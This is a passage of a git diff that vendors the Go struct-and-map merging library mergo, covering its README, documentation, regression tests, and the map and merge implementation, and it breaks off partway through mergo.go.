[RWJMurphy/gorl](https://github.com/RWJMurphy/gorl) +- [andrerocker/deploy42](https://github.com/andrerocker/deploy42) +- [elwinar/rambler](https://github.com/elwinar/rambler) +- [tmaiaroto/gopartman](https://github.com/tmaiaroto/gopartman) +- [jfbus/impressionist](https://github.com/jfbus/impressionist) +- [Jmeyering/zealot](https://github.com/Jmeyering/zealot) +- [godep-migrator/rigger-host](https://github.com/godep-migrator/rigger-host) +- [Dronevery/MultiwaySwitch-Go](https://github.com/Dronevery/MultiwaySwitch-Go) +- [thoas/picfit](https://github.com/thoas/picfit) +- [mantasmatelis/whooplist-server](https://github.com/mantasmatelis/whooplist-server) +- [jnuthong/item_search](https://github.com/jnuthong/item_search) +- [bukalapak/snowboard](https://github.com/bukalapak/snowboard) + +## Installation + + go get github.com/imdario/mergo + + // use in your .go code + import ( + "github.com/imdario/mergo" + ) + +## Usage + +You can only merge same-type structs with exported fields initialized as zero value of their type and same-types maps. Mergo won't merge unexported (private) fields but will do recursively any exported one. It won't merge empty structs value as [they are not considered zero values](https://golang.org/ref/spec#The_zero_value) either. Also maps will be merged recursively except for structs inside maps (because they are not addressable using Go reflection). + +```go +if err := mergo.Merge(&dst, src); err != nil { + // ... +} +``` + +Also, you can merge overwriting values using the transformer `WithOverride`. + +```go +if err := mergo.Merge(&dst, src, mergo.WithOverride); err != nil { + // ... +} +``` + +Additionally, you can map a `map[string]interface{}` to a struct (and otherwise, from struct to map), following the same restrictions as in `Merge()`. Keys are capitalized to find each corresponding exported field. + +```go +if err := mergo.Map(&dst, srcMap); err != nil { + // ... 
+} +``` + +Warning: if you map a struct to map, it won't do it recursively. Don't expect Mergo to map struct members of your struct as `map[string]interface{}`. They will be just assigned as values. + +More information and examples in [godoc documentation](http://godoc.org/github.com/imdario/mergo). + +### Nice example + +```go +package main + +import ( + "fmt" + "github.com/imdario/mergo" +) + +type Foo struct { + A string + B int64 +} + +func main() { + src := Foo{ + A: "one", + B: 2, + } + dest := Foo{ + A: "two", + } + mergo.Merge(&dest, src) + fmt.Println(dest) + // Will print + // {two 2} +} +``` + +Note: if test are failing due missing package, please execute: + + go get gopkg.in/yaml.v2 + +### Transformers + +Transformers allow to merge specific types differently than in the default behavior. In other words, now you can customize how some types are merged. For example, `time.Time` is a struct; it doesn't have zero value but IsZero can return true because it has fields with zero value. How can we merge a non-zero `time.Time`? + +```go +package main + +import ( + "fmt" + "github.com/imdario/mergo" + "reflect" + "time" +) + +type timeTransfomer struct { +} + +func (t timeTransfomer) Transformer(typ reflect.Type) func(dst, src reflect.Value) error { + if typ == reflect.TypeOf(time.Time{}) { + return func(dst, src reflect.Value) error { + if dst.CanSet() { + isZero := dst.MethodByName("IsZero") + result := isZero.Call([]reflect.Value{}) + if result[0].Bool() { + dst.Set(src) + } + } + return nil + } + } + return nil +} + +type Snapshot struct { + Time time.Time + // ... 
+} + +func main() { + src := Snapshot{time.Now()} + dest := Snapshot{} + mergo.Merge(&dest, src, mergo.WithTransformers(timeTransfomer{})) + fmt.Println(dest) + // Will print + // { 2018-01-12 01:15:00 +0000 UTC m=+0.000000001 } +} +``` + + +## Contact me + +If I can help you, you have an idea or you are using Mergo in your projects, don't hesitate to drop me a line (or a pull request): [@im_dario](https://twitter.com/im_dario) + +## About + +Written by [Dario Castañé](http://dario.im). + +## License + +[BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) license, as [Go language](http://golang.org/LICENSE). diff --git a/vendor/github.com/imdario/mergo/doc.go b/vendor/github.com/imdario/mergo/doc.go new file mode 100644 index 0000000000..6e9aa7baf3 --- /dev/null +++ b/vendor/github.com/imdario/mergo/doc.go @@ -0,0 +1,44 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +/* +Package mergo merges same-type structs and maps by setting default values in zero-value fields. + +Mergo won't merge unexported (private) fields but will do recursively any exported one. It also won't merge structs inside maps (because they are not addressable using Go reflection). + +Usage + +From my own work-in-progress project: + + type networkConfig struct { + Protocol string + Address string + ServerType string `json: "server_type"` + Port uint16 + } + + type FssnConfig struct { + Network networkConfig + } + + var fssnDefault = FssnConfig { + networkConfig { + "tcp", + "127.0.0.1", + "http", + 31560, + }, + } + + // Inside a function [...] + + if err := mergo.Merge(&config, fssnDefault); err != nil { + log.Fatal(err) + } + + // More code [...] 
+ +*/ +package mergo diff --git a/vendor/github.com/imdario/mergo/issue17_test.go b/vendor/github.com/imdario/mergo/issue17_test.go new file mode 100644 index 0000000000..f9de805ab7 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue17_test.go @@ -0,0 +1,25 @@ +package mergo + +import ( + "encoding/json" + "testing" +) + +var ( + request = `{"timestamp":null, "name": "foo"}` + maprequest = map[string]interface{}{ + "timestamp": nil, + "name": "foo", + "newStuff": "foo", + } +) + +func TestIssue17MergeWithOverwrite(t *testing.T) { + var something map[string]interface{} + if err := json.Unmarshal([]byte(request), &something); err != nil { + t.Errorf("Error while Unmarshalling maprequest: %s", err) + } + if err := MergeWithOverwrite(&something, maprequest); err != nil { + t.Errorf("Error while merging: %s", err) + } +} diff --git a/vendor/github.com/imdario/mergo/issue23_test.go b/vendor/github.com/imdario/mergo/issue23_test.go new file mode 100644 index 0000000000..283f8c6a3f --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue23_test.go @@ -0,0 +1,27 @@ +package mergo + +import ( + "testing" + "time" +) + +type document struct { + Created *time.Time +} + +func TestIssue23MergeWithOverwrite(t *testing.T) { + now := time.Now() + dst := document{ + &now, + } + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := document{ + &expected, + } + if err := MergeWithOverwrite(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if !dst.Created.Equal(*src.Created) { //--> https://golang.org/pkg/time/#pkg-overview + t.Fatalf("Created not merged in properly: dst.Created(%v) != src.Created(%v)", dst.Created, src.Created) + } +} diff --git a/vendor/github.com/imdario/mergo/issue33_test.go b/vendor/github.com/imdario/mergo/issue33_test.go new file mode 100644 index 0000000000..ae55ae236f --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue33_test.go @@ -0,0 +1,33 @@ +package mergo + +import ( + "testing" +) + +type Foo 
struct { + Str string + Bslice []byte +} + +func TestIssue33Merge(t *testing.T) { + dest := Foo{Str: "a"} + toMerge := Foo{ + Str: "b", + Bslice: []byte{1, 2}, + } + if err := Merge(&dest, toMerge); err != nil { + t.Errorf("Error while merging: %s", err) + } + // Merge doesn't overwrite an attribute if in destination it doesn't have a zero value. + // In this case, Str isn't a zero value string. + if dest.Str != "a" { + t.Errorf("dest.Str should have not been override as it has a non-zero value: dest.Str(%v) != 'a'", dest.Str) + } + // If we want to override, we must use MergeWithOverwrite or Merge using WithOverride. + if err := Merge(&dest, toMerge, WithOverride); err != nil { + t.Errorf("Error while merging: %s", err) + } + if dest.Str != toMerge.Str { + t.Errorf("dest.Str should have been override: dest.Str(%v) != toMerge.Str(%v)", dest.Str, toMerge.Str) + } +} diff --git a/vendor/github.com/imdario/mergo/issue38_test.go b/vendor/github.com/imdario/mergo/issue38_test.go new file mode 100644 index 0000000000..286b68cb1c --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue38_test.go @@ -0,0 +1,59 @@ +package mergo + +import ( + "testing" + "time" +) + +type structWithoutTimePointer struct { + Created time.Time +} + +func TestIssue38Merge(t *testing.T) { + dst := structWithoutTimePointer{ + time.Now(), + } + + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := structWithoutTimePointer{ + expected, + } + if err := Merge(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if dst.Created == src.Created { + t.Fatalf("Created merged unexpectedly: dst.Created(%v) == src.Created(%v)", dst.Created, src.Created) + } +} + +func TestIssue38MergeEmptyStruct(t *testing.T) { + dst := structWithoutTimePointer{} + + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := structWithoutTimePointer{ + expected, + } + if err := Merge(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if 
dst.Created == src.Created { + t.Fatalf("Created merged unexpectedly: dst.Created(%v) == src.Created(%v)", dst.Created, src.Created) + } +} + +func TestIssue38MergeWithOverwrite(t *testing.T) { + dst := structWithoutTimePointer{ + time.Now(), + } + + expected := time.Date(2009, time.November, 10, 23, 0, 0, 0, time.UTC) + src := structWithoutTimePointer{ + expected, + } + if err := MergeWithOverwrite(&dst, src); err != nil { + t.Errorf("Error while merging %s", err) + } + if dst.Created != src.Created { + t.Fatalf("Created not merged in properly: dst.Created(%v) != src.Created(%v)", dst.Created, src.Created) + } +} diff --git a/vendor/github.com/imdario/mergo/issue50_test.go b/vendor/github.com/imdario/mergo/issue50_test.go new file mode 100644 index 0000000000..89aa36345c --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue50_test.go @@ -0,0 +1,18 @@ +package mergo + +import ( + "testing" + "time" +) + +type testStruct struct { + time.Duration +} + +func TestIssue50Merge(t *testing.T) { + to := testStruct{} + from := testStruct{} + if err := Merge(&to, from); err != nil { + t.Fail() + } +} diff --git a/vendor/github.com/imdario/mergo/issue52_test.go b/vendor/github.com/imdario/mergo/issue52_test.go new file mode 100644 index 0000000000..62cd9fa7c0 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue52_test.go @@ -0,0 +1,99 @@ +package mergo + +import ( + "reflect" + "testing" + "time" +) + +type structWithTime struct { + Birth time.Time +} + +type timeTransfomer struct { + overwrite bool +} + +func (t timeTransfomer) Transformer(typ reflect.Type) func(dst, src reflect.Value) error { + if typ == reflect.TypeOf(time.Time{}) { + return func(dst, src reflect.Value) error { + if dst.CanSet() { + if t.overwrite { + isZero := src.MethodByName("IsZero") + result := isZero.Call([]reflect.Value{}) + if !result[0].Bool() { + dst.Set(src) + } + } else { + isZero := dst.MethodByName("IsZero") + result := isZero.Call([]reflect.Value{}) + if result[0].Bool() { + 
dst.Set(src) + } + } + } + return nil + } + } + return nil +} + +func TestOverwriteZeroSrcTime(t *testing.T) { + now := time.Now() + dst := structWithTime{now} + src := structWithTime{} + if err := MergeWithOverwrite(&dst, src); err != nil { + t.FailNow() + } + if !dst.Birth.IsZero() { + t.Fatalf("dst should have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now) + } +} + +func TestOverwriteZeroSrcTimeWithTransformer(t *testing.T) { + now := time.Now() + dst := structWithTime{now} + src := structWithTime{} + if err := MergeWithOverwrite(&dst, src, WithTransformers(timeTransfomer{true})); err != nil { + t.FailNow() + } + if dst.Birth.IsZero() { + t.Fatalf("dst should not have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now) + } +} + +func TestOverwriteZeroDstTime(t *testing.T) { + now := time.Now() + dst := structWithTime{} + src := structWithTime{now} + if err := MergeWithOverwrite(&dst, src); err != nil { + t.FailNow() + } + if dst.Birth.IsZero() { + t.Fatalf("dst should have been overwritten: dst.Birth(%v) != zero(%v)", dst.Birth, time.Time{}) + } +} + +func TestZeroDstTime(t *testing.T) { + now := time.Now() + dst := structWithTime{} + src := structWithTime{now} + if err := Merge(&dst, src); err != nil { + t.FailNow() + } + if !dst.Birth.IsZero() { + t.Fatalf("dst should not have been overwritten: dst.Birth(%v) != zero(%v)", dst.Birth, time.Time{}) + } +} + +func TestZeroDstTimeWithTransformer(t *testing.T) { + now := time.Now() + dst := structWithTime{} + src := structWithTime{now} + if err := Merge(&dst, src, WithTransformers(timeTransfomer{})); err != nil { + t.FailNow() + } + if dst.Birth.IsZero() { + t.Fatalf("dst should have been overwritten: dst.Birth(%v) != now(%v)", dst.Birth, now) + } +} diff --git a/vendor/github.com/imdario/mergo/issue61_test.go b/vendor/github.com/imdario/mergo/issue61_test.go new file mode 100644 index 0000000000..8efa5e4570 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue61_test.go @@ -0,0 +1,20 @@ 
+package mergo + +import ( + "reflect" + "testing" +) + +func TestIssue61MergeNilMap(t *testing.T) { + type T struct { + I map[string][]string + } + t1 := T{} + t2 := T{I: map[string][]string{"hi": {"there"}}} + if err := Merge(&t1, t2); err != nil { + t.Fail() + } + if !reflect.DeepEqual(t2, T{I: map[string][]string{"hi": {"there"}}}) { + t.FailNow() + } +} diff --git a/vendor/github.com/imdario/mergo/issue64_test.go b/vendor/github.com/imdario/mergo/issue64_test.go new file mode 100644 index 0000000000..32382bef16 --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue64_test.go @@ -0,0 +1,38 @@ +package mergo + +import ( + "testing" +) + +type Student struct { + Name string + Books []string +} + +var testData = []struct { + S1 Student + S2 Student + ExpectedSlice []string +}{ + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{"1"}}, []string{"a", "B"}}, + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{}}, []string{"a", "B"}}, + {Student{"Jack", []string{}}, Student{"Tom", []string{"1"}}, []string{"1"}}, + {Student{"Jack", []string{}}, Student{"Tom", []string{}}, []string{}}, +} + +func TestIssue64MergeSliceWithOverride(t *testing.T) { + for _, data := range testData { + err := Merge(&data.S2, data.S1, WithOverride) + if err != nil { + t.Errorf("Error while merging %s", err) + } + if len(data.S2.Books) != len(data.ExpectedSlice) { + t.Fatalf("Got %d elements in slice, but expected %d", len(data.S2.Books), len(data.ExpectedSlice)) + } + for i, val := range data.S2.Books { + if val != data.ExpectedSlice[i] { + t.Fatalf("Expected %s, but got %s while merging slice with override", data.ExpectedSlice[i], val) + } + } + } +} diff --git a/vendor/github.com/imdario/mergo/issue66_test.go b/vendor/github.com/imdario/mergo/issue66_test.go new file mode 100644 index 0000000000..9e4bccedcb --- /dev/null +++ b/vendor/github.com/imdario/mergo/issue66_test.go @@ -0,0 +1,48 @@ +package mergo + +import ( + "testing" +) + +type PrivateSliceTest66 
struct { + PublicStrings []string + privateStrings []string +} + +func TestPrivateSlice(t *testing.T) { + p1 := PrivateSliceTest66{ + PublicStrings: []string{"one", "two", "three"}, + privateStrings: []string{"four", "five"}, + } + p2 := PrivateSliceTest66{ + PublicStrings: []string{"six", "seven"}, + } + if err := Merge(&p1, p2); err != nil { + t.Fatalf("Error during the merge: %v", err) + } + if len(p1.PublicStrings) != 3 { + t.Error("5 elements should be in 'PublicStrings' field") + } + if len(p1.privateStrings) != 2 { + t.Error("2 elements should be in 'privateStrings' field") + } +} + +func TestPrivateSliceWithAppendSlice(t *testing.T) { + p1 := PrivateSliceTest66{ + PublicStrings: []string{"one", "two", "three"}, + privateStrings: []string{"four", "five"}, + } + p2 := PrivateSliceTest66{ + PublicStrings: []string{"six", "seven"}, + } + if err := Merge(&p1, p2, WithAppendSlice); err != nil { + t.Fatalf("Error during the merge: %v", err) + } + if len(p1.PublicStrings) != 5 { + t.Error("5 elements should be in 'PublicStrings' field") + } + if len(p1.privateStrings) != 2 { + t.Error("2 elements should be in 'privateStrings' field") + } +} diff --git a/vendor/github.com/imdario/mergo/map.go b/vendor/github.com/imdario/mergo/map.go new file mode 100644 index 0000000000..6ea38e636b --- /dev/null +++ b/vendor/github.com/imdario/mergo/map.go @@ -0,0 +1,174 @@ +// Copyright 2014 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Based on src/pkg/reflect/deepequal.go from official +// golang's stdlib. 
+ +package mergo + +import ( + "fmt" + "reflect" + "unicode" + "unicode/utf8" +) + +func changeInitialCase(s string, mapper func(rune) rune) string { + if s == "" { + return s + } + r, n := utf8.DecodeRuneInString(s) + return string(mapper(r)) + s[n:] +} + +func isExported(field reflect.StructField) bool { + r, _ := utf8.DecodeRuneInString(field.Name) + return r >= 'A' && r <= 'Z' +} + +// Traverses recursively both values, assigning src's fields values to dst. +// The map argument tracks comparisons that have already been seen, which allows +// short circuiting on recursive types. +func deepMap(dst, src reflect.Value, visited map[uintptr]*visit, depth int, config *Config) (err error) { + overwrite := config.Overwrite + if dst.CanAddr() { + addr := dst.UnsafeAddr() + h := 17 * addr + seen := visited[h] + typ := dst.Type() + for p := seen; p != nil; p = p.next { + if p.ptr == addr && p.typ == typ { + return nil + } + } + // Remember, remember... + visited[h] = &visit{addr, typ, seen} + } + zeroValue := reflect.Value{} + switch dst.Kind() { + case reflect.Map: + dstMap := dst.Interface().(map[string]interface{}) + for i, n := 0, src.NumField(); i < n; i++ { + srcType := src.Type() + field := srcType.Field(i) + if !isExported(field) { + continue + } + fieldName := field.Name + fieldName = changeInitialCase(fieldName, unicode.ToLower) + if v, ok := dstMap[fieldName]; !ok || (isEmptyValue(reflect.ValueOf(v)) || overwrite) { + dstMap[fieldName] = src.Field(i).Interface() + } + } + case reflect.Ptr: + if dst.IsNil() { + v := reflect.New(dst.Type().Elem()) + dst.Set(v) + } + dst = dst.Elem() + fallthrough + case reflect.Struct: + srcMap := src.Interface().(map[string]interface{}) + for key := range srcMap { + srcValue := srcMap[key] + fieldName := changeInitialCase(key, unicode.ToUpper) + dstElement := dst.FieldByName(fieldName) + if dstElement == zeroValue { + // We discard it because the field doesn't exist. 
+ continue + } + srcElement := reflect.ValueOf(srcValue) + dstKind := dstElement.Kind() + srcKind := srcElement.Kind() + if srcKind == reflect.Ptr && dstKind != reflect.Ptr { + srcElement = srcElement.Elem() + srcKind = reflect.TypeOf(srcElement.Interface()).Kind() + } else if dstKind == reflect.Ptr { + // Can this work? I guess it can't. + if srcKind != reflect.Ptr && srcElement.CanAddr() { + srcPtr := srcElement.Addr() + srcElement = reflect.ValueOf(srcPtr) + srcKind = reflect.Ptr + } + } + + if !srcElement.IsValid() { + continue + } + if srcKind == dstKind { + if err = deepMerge(dstElement, srcElement, visited, depth+1, config); err != nil { + return + } + } else if dstKind == reflect.Interface && dstElement.Kind() == reflect.Interface { + if err = deepMerge(dstElement, srcElement, visited, depth+1, config); err != nil { + return + } + } else if srcKind == reflect.Map { + if err = deepMap(dstElement, srcElement, visited, depth+1, config); err != nil { + return + } + } else { + return fmt.Errorf("type mismatch on %s field: found %v, expected %v", fieldName, srcKind, dstKind) + } + } + } + return +} + +// Map sets fields' values in dst from src. +// src can be a map with string keys or a struct. dst must be the opposite: +// if src is a map, dst must be a valid pointer to struct. If src is a struct, +// dst must be map[string]interface{}. +// It won't merge unexported (private) fields and will do recursively +// any exported field. +// If dst is a map, keys will be src fields' names in lower camel case. +// Missing key in src that doesn't match a field in dst will be skipped. This +// doesn't apply if dst is a map. +// This is separated method from Merge because it is cleaner and it keeps sane +// semantics: merging equal types, mapping different (restricted) types. +func Map(dst, src interface{}, opts ...func(*Config)) error { + return _map(dst, src, opts...) 
+} + +// MapWithOverwrite will do the same as Map except that non-empty dst attributes will be overridden by +// non-empty src attribute values. +// Deprecated: Use Map(…) with WithOverride +func MapWithOverwrite(dst, src interface{}, opts ...func(*Config)) error { + return _map(dst, src, append(opts, WithOverride)...) +} + +func _map(dst, src interface{}, opts ...func(*Config)) error { + var ( + vDst, vSrc reflect.Value + err error + ) + config := &Config{} + + for _, opt := range opts { + opt(config) + } + + if vDst, vSrc, err = resolveValues(dst, src); err != nil { + return err + } + // To be friction-less, we redirect equal-type arguments + // to deepMerge. Only because arguments can be anything. + if vSrc.Kind() == vDst.Kind() { + return deepMerge(vDst, vSrc, make(map[uintptr]*visit), 0, config) + } + switch vSrc.Kind() { + case reflect.Struct: + if vDst.Kind() != reflect.Map { + return ErrExpectedMapAsDestination + } + case reflect.Map: + if vDst.Kind() != reflect.Struct { + return ErrExpectedStructAsDestination + } + default: + return ErrNotSupported + } + return deepMap(vDst, vSrc, make(map[uintptr]*visit), 0, config) +} diff --git a/vendor/github.com/imdario/mergo/merge.go b/vendor/github.com/imdario/mergo/merge.go new file mode 100644 index 0000000000..706b22069c --- /dev/null +++ b/vendor/github.com/imdario/mergo/merge.go @@ -0,0 +1,245 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Based on src/pkg/reflect/deepequal.go from official +// golang's stdlib. 
+ +package mergo + +import ( + "reflect" +) + +func hasExportedField(dst reflect.Value) (exported bool) { + for i, n := 0, dst.NumField(); i < n; i++ { + field := dst.Type().Field(i) + if field.Anonymous && dst.Field(i).Kind() == reflect.Struct { + exported = exported || hasExportedField(dst.Field(i)) + } else { + exported = exported || len(field.PkgPath) == 0 + } + } + return +} + +type Config struct { + Overwrite bool + AppendSlice bool + Transformers Transformers +} + +type Transformers interface { + Transformer(reflect.Type) func(dst, src reflect.Value) error +} + +// Traverses recursively both values, assigning src's fields values to dst. +// The map argument tracks comparisons that have already been seen, which allows +// short circuiting on recursive types. +func deepMerge(dst, src reflect.Value, visited map[uintptr]*visit, depth int, config *Config) (err error) { + overwrite := config.Overwrite + + if !src.IsValid() { + return + } + if dst.CanAddr() { + addr := dst.UnsafeAddr() + h := 17 * addr + seen := visited[h] + typ := dst.Type() + for p := seen; p != nil; p = p.next { + if p.ptr == addr && p.typ == typ { + return nil + } + } + // Remember, remember... 
+ visited[h] = &visit{addr, typ, seen} + } + + if config.Transformers != nil && !isEmptyValue(dst) { + if fn := config.Transformers.Transformer(dst.Type()); fn != nil { + err = fn(dst, src) + return + } + } + + switch dst.Kind() { + case reflect.Struct: + if hasExportedField(dst) { + for i, n := 0, dst.NumField(); i < n; i++ { + if err = deepMerge(dst.Field(i), src.Field(i), visited, depth+1, config); err != nil { + return + } + } + } else { + if dst.CanSet() && !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } + case reflect.Map: + if dst.IsNil() && !src.IsNil() { + dst.Set(reflect.MakeMap(dst.Type())) + } + for _, key := range src.MapKeys() { + srcElement := src.MapIndex(key) + if !srcElement.IsValid() { + continue + } + dstElement := dst.MapIndex(key) + switch srcElement.Kind() { + case reflect.Chan, reflect.Func, reflect.Map, reflect.Interface, reflect.Slice: + if srcElement.IsNil() { + continue + } + fallthrough + default: + if !srcElement.CanInterface() { + continue + } + switch reflect.TypeOf(srcElement.Interface()).Kind() { + case reflect.Struct: + fallthrough + case reflect.Ptr: + fallthrough + case reflect.Map: + srcMapElm := srcElement + dstMapElm := dstElement + if srcMapElm.CanInterface() { + srcMapElm = reflect.ValueOf(srcMapElm.Interface()) + if dstMapElm.IsValid() { + dstMapElm = reflect.ValueOf(dstMapElm.Interface()) + } + } + if err = deepMerge(dstMapElm, srcMapElm, visited, depth+1, config); err != nil { + return + } + case reflect.Slice: + srcSlice := reflect.ValueOf(srcElement.Interface()) + + var dstSlice reflect.Value + if !dstElement.IsValid() || dstElement.IsNil() { + dstSlice = reflect.MakeSlice(srcSlice.Type(), 0, srcSlice.Len()) + } else { + dstSlice = reflect.ValueOf(dstElement.Interface()) + } + + if !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) && !config.AppendSlice { + dstSlice = srcSlice + } else if config.AppendSlice { + dstSlice = reflect.AppendSlice(dstSlice, srcSlice) + } + 
dst.SetMapIndex(key, dstSlice) + } + } + if dstElement.IsValid() && reflect.TypeOf(srcElement.Interface()).Kind() == reflect.Map { + continue + } + + if srcElement.IsValid() && (overwrite || (!dstElement.IsValid() || isEmptyValue(dstElement))) { + if dst.IsNil() { + dst.Set(reflect.MakeMap(dst.Type())) + } + dst.SetMapIndex(key, srcElement) + } + } + case reflect.Slice: + if !dst.CanSet() { + break + } + if !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) && !config.AppendSlice { + dst.Set(src) + } else if config.AppendSlice { + dst.Set(reflect.AppendSlice(dst, src)) + } + case reflect.Ptr: + fallthrough + case reflect.Interface: + if src.IsNil() { + break + } + if src.Kind() != reflect.Interface { + if dst.IsNil() || overwrite { + if dst.CanSet() && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } else if src.Kind() == reflect.Ptr { + if err = deepMerge(dst.Elem(), src.Elem(), visited, depth+1, config); err != nil { + return + } + } else if dst.Elem().Type() == src.Type() { + if err = deepMerge(dst.Elem(), src, visited, depth+1, config); err != nil { + return + } + } else { + return ErrDifferentArgumentsTypes + } + break + } + if dst.IsNil() || overwrite { + if dst.CanSet() && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } else if err = deepMerge(dst.Elem(), src.Elem(), visited, depth+1, config); err != nil { + return + } + default: + if dst.CanSet() && !isEmptyValue(src) && (overwrite || isEmptyValue(dst)) { + dst.Set(src) + } + } + return +} + +// Merge will fill any empty for value type attributes on the dst struct using corresponding +// src attributes if they themselves are not empty. dst and src must be valid same-type structs +// and dst must be a pointer to struct. +// It won't merge unexported (private) fields and will do recursively any exported field. +func Merge(dst, src interface{}, opts ...func(*Config)) error { + return merge(dst, src, opts...) 
+} + +// MergeWithOverwrite will do the same as Merge except that non-empty dst attributes will be overriden by +// non-empty src attribute values. +// Deprecated: use Merge(…) with WithOverride +func MergeWithOverwrite(dst, src interface{}, opts ...func(*Config)) error { + return merge(dst, src, append(opts, WithOverride)...) +} + +// WithTransformers adds transformers to merge, allowing to customize the merging of some types. +func WithTransformers(transformers Transformers) func(*Config) { + return func(config *Config) { + config.Transformers = transformers + } +} + +// WithOverride will make merge override non-empty dst attributes with non-empty src attributes values. +func WithOverride(config *Config) { + config.Overwrite = true +} + +// WithAppendSlice will make merge append slices instead of overwriting it +func WithAppendSlice(config *Config) { + config.AppendSlice = true +} + +func merge(dst, src interface{}, opts ...func(*Config)) error { + var ( + vDst, vSrc reflect.Value + err error + ) + + config := &Config{} + + for _, opt := range opts { + opt(config) + } + + if vDst, vSrc, err = resolveValues(dst, src); err != nil { + return err + } + if vDst.Type() != vSrc.Type() { + return ErrDifferentArgumentsTypes + } + return deepMerge(vDst, vSrc, make(map[uintptr]*visit), 0, config) +} diff --git a/vendor/github.com/imdario/mergo/merge_appendslice_test.go b/vendor/github.com/imdario/mergo/merge_appendslice_test.go new file mode 100644 index 0000000000..a780f34a3c --- /dev/null +++ b/vendor/github.com/imdario/mergo/merge_appendslice_test.go @@ -0,0 +1,33 @@ +package mergo + +import ( + "testing" +) + +var testDataS = []struct { + S1 Student + S2 Student + ExpectedSlice []string +}{ + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{"1"}}, []string{"1", "a", "B"}}, + {Student{"Jack", []string{"a", "B"}}, Student{"Tom", []string{}}, []string{"a", "B"}}, + {Student{"Jack", []string{}}, Student{"Tom", []string{"1"}}, []string{"1"}}, + {Student{"Jack", 
[]string{}}, Student{"Tom", []string{}}, []string{}}, +} + +func TestMergeSliceWithOverrideWithAppendSlice(t *testing.T) { + for _, data := range testDataS { + err := Merge(&data.S2, data.S1, WithOverride, WithAppendSlice) + if err != nil { + t.Errorf("Error while merging %s", err) + } + if len(data.S2.Books) != len(data.ExpectedSlice) { + t.Fatalf("Got %d elements in slice, but expected %d", len(data.S2.Books), len(data.ExpectedSlice)) + } + for i, val := range data.S2.Books { + if val != data.ExpectedSlice[i] { + t.Fatalf("Expected %s, but got %s while merging slice with override", data.ExpectedSlice[i], val) + } + } + } +} diff --git a/vendor/github.com/imdario/mergo/merge_test.go b/vendor/github.com/imdario/mergo/merge_test.go new file mode 100644 index 0000000000..5bf808a786 --- /dev/null +++ b/vendor/github.com/imdario/mergo/merge_test.go @@ -0,0 +1,50 @@ +package mergo + +import ( + "reflect" + "testing" +) + +type transformer struct { + m map[reflect.Type]func(dst, src reflect.Value) error +} + +func (s *transformer) Transformer(t reflect.Type) func(dst, src reflect.Value) error { + if fn, ok := s.m[t]; ok { + return fn + } + return nil +} + +type foo struct { + s string + Bar *bar +} + +type bar struct { + i int + s map[string]string +} + +func TestMergeWithTransformerNilStruct(t *testing.T) { + a := foo{s: "foo"} + b := foo{Bar: &bar{i: 2, s: map[string]string{"foo": "bar"}}} + if err := Merge(&a, &b, WithOverride, WithTransformers(&transformer{ + m: map[reflect.Type]func(dst, src reflect.Value) error{ + reflect.TypeOf(&bar{}): func(dst, src reflect.Value) error { + // Do sthg with Elem + t.Log(dst.Elem().FieldByName("i")) + t.Log(src.Elem()) + return nil + }, + }, + })); err != nil { + t.Fatal(err) + } + if a.s != "foo" { + t.Fatalf("b not merged in properly: a.s.Value(%s) != expected(%s)", a.s, "foo") + } + if a.Bar == nil { + t.Fatalf("b not merged in properly: a.Bar shouldn't be nil") + } +} diff --git a/vendor/github.com/imdario/mergo/mergo.go 
b/vendor/github.com/imdario/mergo/mergo.go new file mode 100644 index 0000000000..a82fea2fdc --- /dev/null +++ b/vendor/github.com/imdario/mergo/mergo.go @@ -0,0 +1,97 @@ +// Copyright 2013 Dario Castañé. All rights reserved. +// Copyright 2009 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Based on src/pkg/reflect/deepequal.go from official +// golang's stdlib. + +package mergo + +import ( + "errors" + "reflect" +) + +// Errors reported by Mergo when it finds invalid arguments. +var ( + ErrNilArguments = errors.New("src and dst must not be nil") + ErrDifferentArgumentsTypes = errors.New("src and dst must be of same type") + ErrNotSupported = errors.New("only structs and maps are supported") + ErrExpectedMapAsDestination = errors.New("dst was expected to be a map") + ErrExpectedStructAsDestination = errors.New("dst was expected to be a struct") +) + +// During deepMerge, must keep track of checks that are +// in progress. The comparison algorithm assumes that all +// checks in progress are true when it reencounters them. +// Visited are stored in a map indexed by 17 * a1 + a2; +type visit struct { + ptr uintptr + typ reflect.Type + next *visit +} + +// From src/pkg/encoding/json/encode.go. 
